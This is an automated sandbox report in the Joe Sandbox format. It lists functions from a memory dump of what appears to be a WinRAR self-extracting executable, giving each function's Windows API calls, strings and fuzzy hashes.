Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
Instruction ID: d25db70b5121c76c4734ade200aa41f36477e0b0a4af1f14e4ad05b7e37b2157
Opcode Fuzzy Hash: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
Instruction Fuzzy Hash: BB12E362F58B4584FB14EB65D9442BDA371EF587A8F802232DA5C17AEADF3CD486C310

Function 00007FF70E7924C0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF70E79259B
GetLastError.KERNEL32 ref: 00007FF70E7925AE
CreateFileW.KERNEL32 ref: 00007FF70E79260E
GetLastError.KERNEL32 ref: 00007FF70E792617
SetFileTime.KERNEL32 ref: 00007FF70E7926C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E792736

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
Instruction ID: e30e000add779d0add1649b521219a7e665267ad9e606432867c935225070b1a
Opcode Fuzzy Hash: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
Instruction Fuzzy Hash: 3C61D966A1868145E714AB29F90036EA7B1FF887B8F502334DFAD03AE9DF3DD0948754

Function 00007FF70E7AFA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.ADVAPI32 ref: 00007FF70E7AFB20
RegSetValueExW.ADVAPI32 ref: 00007FF70E7AFB65
RegCloseKey.ADVAPI32 ref: 00007FF70E7AFB6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AFBD3

Strings

Software\WinRAR SFX, xrefs: 00007FF70E7AFB12

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CloseCreateValue_invalid_parameter_noinfo_noreturn
String ID: Software\WinRAR SFX
API String ID: 207320342-754673328
Opcode ID: 83cc995b7a56d11fe18315dcab67657edd613bff7608f24d2fbf991acf9cacb4
Instruction ID: 47a47f50cb19081c04b6665d9965a5769563e1fa509b992a2a2fe918ccbb5128
Opcode Fuzzy Hash: 83cc995b7a56d11fe18315dcab67657edd613bff7608f24d2fbf991acf9cacb4
Instruction Fuzzy Hash: 30417132604A4289EB14EF34E8547A9B3A5FF8C798F842635EA5C43B98DF3CD194C710

Function 00007FF70E7AB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF70E7AB02A
GetObjectW.GDI32 ref: 00007FF70E7AB05B
DeleteObject.GDI32 ref: 00007FF70E7AB095
DeleteObject.GDI32 ref: 00007FF70E7AB0C5

Part of subcall function 00007FF70E7A8624: FindResourceW.KERNEL32 ref: 00007FF70E7A863D
Part of subcall function 00007FF70E7A8624: SizeofResource.KERNEL32 ref: 00007FF70E7A8659
Part of subcall function 00007FF70E7A8624: LoadResource.KERNEL32 ref: 00007FF70E7A8673
Part of subcall function 00007FF70E7A8624: LockResource.KERNEL32 ref: 00007FF70E7A8685
Part of subcall function 00007FF70E7A8624: GlobalAlloc.KERNELBASE ref: 00007FF70E7A86A6
Part of subcall function 00007FF70E7A8624: GlobalLock.KERNEL32 ref: 00007FF70E7A86BB
Part of subcall function 00007FF70E7A8624: CreateStreamOnHGlobal.COMBASE ref: 00007FF70E7A86E8
Part of subcall function 00007FF70E7A8624: GdipAlloc.GDIPLUS ref: 00007FF70E7A86FE
Part of subcall function 00007FF70E7A8624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF70E7A8769
Part of subcall function 00007FF70E7A8624: GlobalUnlock.KERNEL32 ref: 00007FF70E7A878C
Part of subcall function 00007FF70E7A8624: GlobalFree.KERNEL32 ref: 00007FF70E7A8795

Strings

], xrefs: 00007FF70E7AB063

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
String ID: ]
API String ID: 3561356813-3352871620
Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction ID: a3f7ca956db12d91c200152e0c8e1d49a266d011d39418ee724649a127fd3ebc
Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction Fuzzy Hash: D5116321B0D64242FA64BB21FA54279E291AFCCBC4F8C2434D95D07B9AEF3DE8058621

Function 00007FF70E7AAE1C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF70E7AAE32
GetMessageW.USER32 ref: 00007FF70E7AAE49
IsDialogMessageW.USER32 ref: 00007FF70E7AAE60
TranslateMessage.USER32 ref: 00007FF70E7AAE6F
DispatchMessageW.USER32 ref: 00007FF70E7AAE7A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction ID: a9c5cb15929bac88dbd191e07a1424f0f24516d5079b4892aaba1f51d2aaa500
Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction Fuzzy Hash: 9DF0EC25A3854282FB50AB20EC95A36B361FFDC709FC46835E64E41954DF3CD548CB11

Function 00007FF70E7A91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF70E7A9211
SHAutoComplete.SHLWAPI ref: 00007FF70E7A9255

Part of subcall function 00007FF70E7A13C4: CompareStringW.KERNEL32 ref: 00007FF70E7A13E3

FindWindowExW.USER32 ref: 00007FF70E7A923F

Strings

EDIT, xrefs: 00007FF70E7A921B, 00007FF70E7A9233

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: 849bd98726c5d6a47c1cd1e1381a1df6d0e6128c45256236070ee6442302c39f
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: 38014F61A18A4781FA20AB21FC103A5A395AFDC744FC82031CA4D06695EF3CD199C660

Function 00007FF70E792CE0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF70E798C9A), ref: 00007FF70E792D22
WriteFile.KERNEL32 ref: 00007FF70E792D6C
WriteFile.KERNELBASE ref: 00007FF70E792D9A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
Instruction ID: b0d51b720fe4006616b33f34e5f3e0958e06aabd3d79dbfa8bc1325288c451cd
Opcode Fuzzy Hash: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
Instruction Fuzzy Hash: FF512622B1968292FB54FB35EC4477AA360FF48B94F802135EA4D07AA5DF3CE485C320

Function 00007FF70E7B03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32 ref: 00007FF70E7B0556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B05C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B05C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B05CD

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$TextWindow
String ID:
API String ID: 2912839123-0
Opcode ID: 8fc8b3a629483fc6f36b0b349d94c078e113b5cac70ce2541e49982725d63c6b
Instruction ID: b43e1eb8d6a8f02b3d96bbbb0113684727658628ca061b55c15a3264066500c0
Opcode Fuzzy Hash: 8fc8b3a629483fc6f36b0b349d94c078e113b5cac70ce2541e49982725d63c6b
Instruction Fuzzy Hash: 1451B562F1465284FB00EB65DC453AE6322BF597A4FD02636DA5C17BE6EF6CD441C320

Function 00007FF70E7B2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF70E7B2D7B

Part of subcall function 00007FF70E7B27FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF70E7B281E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF70E7B2D90
__scrt_release_startup_lock.LIBCMT ref: 00007FF70E7B2DFE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF70E7B2E51

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction ID: 0847ff5d281e8dfee709b424c5064b45e7694573f86054be5ec2a748599f683a
Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction Fuzzy Hash: 57316010E0E18341FA55BB65EC553BAE291AF6D344FC47438EA8E4B2E3DF6CB8448271

Function 00007FF70E793684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF70E79309D), ref: 00007FF70E7936CE
CreateDirectoryW.KERNEL32 ref: 00007FF70E793733
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF70E79309D), ref: 00007FF70E793791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7937CE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
Instruction ID: d382fff190c69b45bc8553db68b77e896d773689fdf3d116ab909ed65ec8ba61
Opcode Fuzzy Hash: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
Instruction Fuzzy Hash: 9F319566A0C68251EA20BB35E884279E361FF8D7A0FD42231EE9D437D5DF3CE4858610

Function 00007FF70E792320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF70E792927,?,00100000,?,00000001,00000000,00000000,?,00007FF70E7914C1), ref: 00007FF70E792348
ReadFile.KERNELBASE ref: 00007FF70E792367
GetLastError.KERNEL32 ref: 00007FF70E79239B
GetLastError.KERNEL32 ref: 00007FF70E7923BA

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: 072bb7127c1e7dc8d98e82753f6e90251160dd19edc463c4a89f635d831b21d5
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: 7A219222A0C582D1EA60BB31FC00239E3A4FF49B94F946534DA5D466A6CF7CE8858761

Function 00007FF70E79E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E79ECD8: ResetEvent.KERNEL32 ref: 00007FF70E79ECF1
Part of subcall function 00007FF70E79ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF70E79ED07

ReleaseSemaphore.KERNEL32 ref: 00007FF70E79E974
CloseHandle.KERNELBASE ref: 00007FF70E79E993
DeleteCriticalSection.KERNEL32 ref: 00007FF70E79E9AA
CloseHandle.KERNEL32 ref: 00007FF70E79E9B7

Part of subcall function 00007FF70E79EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA63
Part of subcall function 00007FF70E79EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA6E

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: 64d801e9204cd30a91a094671f452fe93be545e53b2beba1c8e73095303bf178
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: B101E933A18A91A3E648EB21E94426DA365FF88BA0F405035DB6E03665CF39F4F58751

Function 00007FF70E79EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF70E79EAE0
SetThreadPriority.KERNEL32 ref: 00007FF70E79EB36

Strings

CreateThread failed, xrefs: 00007FF70E79EAEE

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: e67c14ac9e77ffaa725fc4936324a750ce449dccb15686c50d615e82b3f1c301
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: E0116031A08A4281E704EB10EC411B9F3B0FF8C794F945136D64D42668EF7CE586C720

Function 00007FF70E7A946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E79DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF70E79DDDF

OleInitialize.OLE32 ref: 00007FF70E7A9486
SHGetMalloc.SHELL32 ref: 00007FF70E7A94D4

Strings

riched20.dll, xrefs: 00007FF70E7A9475

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction ID: 09cb6ffa45c807a4af9bbc6201ba7cfab9a157fea8cb15b4a96922d126ee0cee
Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction Fuzzy Hash: 3FF04F71618A8182EB10AF60F81526AF3A0FF8C758F801135EA8E46B64DF7CD189CB10

Function 00007FF70E7A095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E7A853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF70E7A856C

Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB67
Part of subcall function 00007FF70E79AAE0: LoadStringW.USER32 ref: 00007FF70E79AB80

Part of subcall function 00007FF70E781FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781FFB

Part of subcall function 00007FF70E78129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E781396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B01BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7B01C1
SendDlgItemMessageW.USER32 ref: 00007FF70E7B01F2

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: 8c360d5f5e245417109053446ee31c3b82c6562e62a189eed3094808beb71bb9
Instruction ID: 44adcdaa541c66796ae9d35688605a2a3c8b9a01c9e9525ccf081569af60bd8c
Opcode Fuzzy Hash: 8c360d5f5e245417109053446ee31c3b82c6562e62a189eed3094808beb71bb9
